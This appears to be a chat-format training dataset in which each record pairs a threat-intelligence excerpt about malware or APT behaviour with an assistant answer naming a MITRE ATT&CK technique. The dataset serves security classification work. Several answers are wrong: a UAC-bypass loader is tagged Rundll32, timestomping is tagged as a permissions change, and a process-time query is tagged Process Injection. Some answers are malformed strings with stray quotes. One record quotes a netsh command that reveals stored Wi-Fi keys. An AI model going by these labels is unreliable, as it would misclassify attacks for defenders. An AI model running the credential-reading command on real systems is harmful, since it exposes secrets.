- "content": "malware has obtained the victim username and sent it to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SpyNote RAT captured the device’s screen activities along with audio using the MediaProjectionCallback functionality (available with Lollipop, the Android 5.0 release, and later) and saved the output in a file named \"video.mp4\" as shown in the following screenshot: Figure 5 : Output File SMS stealing SpyNote RAT was also observed stealing SMS messages from the affected devices, as shown in screenshot below: Figure 6: Reading SMS messages Stealing contacts The ability to steal contacts is a favorite feature for spyware developers, as the stolen contacts can be used to further spread the spyware"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This is an application document that has been used to provide a decoy to the Bisonal malware. This conference has some high-ranking government and business attendees. In 2019, a Russian RTF document — судалгаа.doc (research.doc) — was used with an exploit to drop the winhelp.wll file, which contains Bisonal. Based on our research and the released paper mentioned above, the Bisonal malware is part of the Tonto Team arsenal. Tonto Team was mentioned in the media in 2017 as one of the actors who targeted South Korea, when the country announced it would deploy a Terminal High-Altitude Air Defense (THAAD) in response to North Korean missile tests. At this time, researchers connected the Tonto Team to China"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Siloscape makes various native API calls."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet encodes the payload of system information sent to the command and control servers using a one byte 0xFF XOR key. Stuxnet also uses a 31-byte long static byte string to XOR data sent to command and control servers. The servers use a different static key to encrypt replies to the implant."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "provides a reverse shell on the victim."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SHA256 file hashes for 119 malspam attachments, 30 extracted Redaman executable files, and 30 dropped Redaman DLL files found from September through December 2018. Information is available at: https://github.com/pan-unit42/iocs/blob/master/Redaman_banking_malware/2018-09-thru-2018-12-file-hashes-for-Redaman-banking-malware.txt ."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment', 'T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To further confuse anti-malware solutions, the loader contains the entire unobfuscated code of a legitimate open source application called Blink (https://github.com/crosire/blink), which never gets executed"
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flame appears to have two modules designed for infecting USB sticks, called “Autorun Infector” and “Euphoria”. We haven’t seen them in action yet, maybe due to the fact that Flame appears to be disabled in the configuration data. Nevertheless, the ability to infect USB sticks exists in the code, and it’s using two methods"
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware gathers data from the local victim system."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "H1N1 uses multiple techniques to obfuscate strings, including XOR."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All of the attacks involved spear-phishing emails to deliver malicious documents that required the recipient to carry out some action. The payload in a majority of these attacks was a backdoor called Spark, which is a backdoor that allows the threat actors to open applications and run command line commands on the compromised system"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link', 'T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TAINTEDSCRIBE uses a Linear Feedback Shift Register (LFSR) algorithm for network encryption."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ChChes establishes persistence by adding a Registry Run key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Determine whether the victim’s host machine is running Windows with an x86 or x64 architecture. Parse the contents of a corresponding textbox within the document and convert it to a command line argument specific to the Windows architecture on the victim’s machine"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Confucius has used VBScript to execute malicious code."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An increasingly popular tactic by threat actors is to use legitimate hosting services like Google Cloud or CloudFlare for their payload and C2 infrastructure, making it much more difficult to safely block IPs"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The authors of Black Lambert included a couple of very interesting details in the sample, which read as the following: toolType=wl, build=132914, versionName = 2.0.0. Looking for similar samples, we were able to identify another generation of related tools which we called White Lambert. While Black Lambert connects directly to its C&C for instructions, White Lambert is a fully passive, network-driven backdoor."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MCMD has the ability to upload files from an infected device."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper has been known to side-load DLLs using a valid version of a Windows Address Book and Windows Defender executable with one of their tools."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Listing the C:/ drive contents using cd C:/; ls; - Listing the specific Wi-Fi profile details using netsh wlan show profiles name='<Name>' key=clear; - Listing the drives using Get-PSDrive"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery', 'T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gather the process time for all processes Getting time information for all processes running on the system"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection', 'T1057 - Process Discovery', 'T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The operators simply deploy their first-stage .php script in them, which will check the connection and get the actual C2 server domain name using an HTTP GET request"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Throughout our investigation, many of the analyzed ZeroT RAR SFX samples (e.g. 67693ddb6236d3ef790059409ae240212c47acfd8c1c76d65c3ef19096fdf43b) contained a file named Go.exe which performs Windows UAC bypass. This executable contains a PDB path indicating its purpose of bypassing UAC (Fig"
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Olympic Destroyer uses Windows Management Instrumentation to enumerate all systems in the network."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cherry Picker exfiltrates files over FTP."
- },
- {
- "role": "assistant",
- "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FatDuke can execute via rundll32."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "connects to a predefined domain on port 443 to exfil gathered information."
- },
- {
- "role": "assistant",
- "content": "T1048 - Exfiltration Over Alternative Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "mshlpweb.dll is a loader that uses a known token impersonation technique to elevate permissions and execute install.bat with high privileges. To gain higher privileges mshlpweb.dll execute the Windows Update Standalone Installer, wusa.exe. This process runs as a high-integrity process by default, since its set to auto-elevate within its manifest"
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StrifeWater can collect the time zone from the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exfiltrate data using HTTP over HTTP over AES over XOR, or any combination of the available transports"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Epic recursively searches for all .doc files on the system and collects a directory listing of the Desktop, %TEMP%, and %WINDOWS%\\Temp directories."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has signed files with the name EGIS CO,. Ltd.."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Data captured by RawPOS is placed in a temporary file under a directory named \"memdump\"."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Trojan does not encrypt the data sent via DNS beacons, rather it converts the ASCII characters into their hexadecimal values and includes these values in cleartext. The DNS beacons sent from the Helminth executable have the following structure, which is very similar to the script version"
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Confucius has used a file stealer that checks the Document, Downloads, Desktop, and Picture folders for documents and images with specific extensions."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tarrask is able to delete the Security Descriptor (`SD`) registry subkey in order to “hide” scheduled tasks."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Variants of have added Run Registry keys to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerDuke has a command to download a file."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Displays and modifies entries in the Address Resolution Protocol (ARP) cache, which contains one or more tables that are used to store IP addresses and their resolved Ethernet or Token Ring physical addresses. Used without parameters, arp displays help"
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The C2 domain name for the DNS communication is hardcoded and obfuscated using XOR. The backdoor will generate a subdomain using a custom domain generation algorithm (DGA) and try to send an initial beacon to the C2 via DNS tunneling"
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 has used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "First, it captures the desktop window and sets the background color to black. It then writes \"All your files are encrypted. For more information see “README-FOR-DECRYPT.txt\" with DrawText API to a bitmap image and saves it as \"encr.bmp\" in the public pictures folder. Finally, it changes the desktop wallpaper to the new image using the SystemParametersInfoAPI with the SPI_SETDESKWALLPAPER flag"
- },
- {
- "role": "assistant",
- "content": "T1491.001 - Defacement: Internal Defacement"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this particular instance, the payload is encoded via base64, which certutil decodes"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke's miner connects to a C2 server using port 51640."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "jRAT collects information about the OS (version, build type, install date) as well as system up-time upon receiving a connection from a backdoor."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ISMInjector is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used credential dumping tools such as Mimikatz to steal credentials to accounts logged into the compromised system and to Outlook Web Access."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "STARWHALE can gather the computer name of an infected host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerSploit's \"Invoke-Kerberoast\" module can request service tickets and return crackable ticket hashes."
- },
- {
- "role": "assistant",
- "content": "T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Comnie uses blogs and third-party sites (GitHub, tumbler, and BlogSpot) to avoid DNS-based blocking of their communication to the command and control server."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SideTwist can execute shell commands on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One TYPEFRAME variant decrypts an archive using an RC4 key, then decompresses and installs the decrypted malicious DLL module. Another variant decodes the embedded file by XORing it with the value \"0x35\"."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dark Caracal collected file listings of all default Windows directories."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "clears event logs."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This command is particularly interesting as it enables an alternative command and control channel that uses the Google Drive API"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can gather information about the host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SLOTHFULMEDIA can enumerate files and directories."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mis-Type may create a file containing the results of the command \"cmd.exe /c net user {Username}\"."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once explorer.exe is running, the service configures the environment and executes the C2 contact module: winprint32.exe. This module is responsible for launching the document search module, contact the C2 and exfiltrate the collected documents"
- },
- {
- "role": "assistant",
- "content": "T1020 - Automated Exfiltration', 'T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has run \"ipconfig /all\" on a victim."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has attempted to get victims to open malicious files such as Windows Shortcuts (.lnk) and/or Microsoft Office documents, sent via email as part of spearphishing campaigns."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERSTATS can disable Microsoft Office Protected View by changing Registry keys."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The touch utility sets the modification and access times of files. If any file does not exist, it is created with default permissions. This makes the utility useful to malware in two common scenarios: for creating an empty file at a given path that is later passed data, and/or for changing the timestamp on a file as a means of evasion, also known as “timestomping"
- },
- {
- "role": "assistant",
- "content": "T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "networkDll32 Trickbot uses this encrypted module to scan the network and steal relevant network information. It executes the following commands to gather information on the infected system"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has exploited multiple Microsoft Office and .NET vulnerabilities for execution, including CVE-2017-0199, CVE-2017-8759, and CVE-2017-11882."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS) mechanism to communicate with the C2 over HTTP"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols', 'T1041 - Exfiltration Over C2 Channel', 'T1071 - Application Layer Protocol', 'T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has delivered JHUHUGIT and Koadic by executing PowerShell commands through DDE in Word documents."
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has used domain credentials, including domain admin, for lateral movement and privilege escalation."
- },
- {
- "role": "assistant",
- "content": "T1078.002 - Domain Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
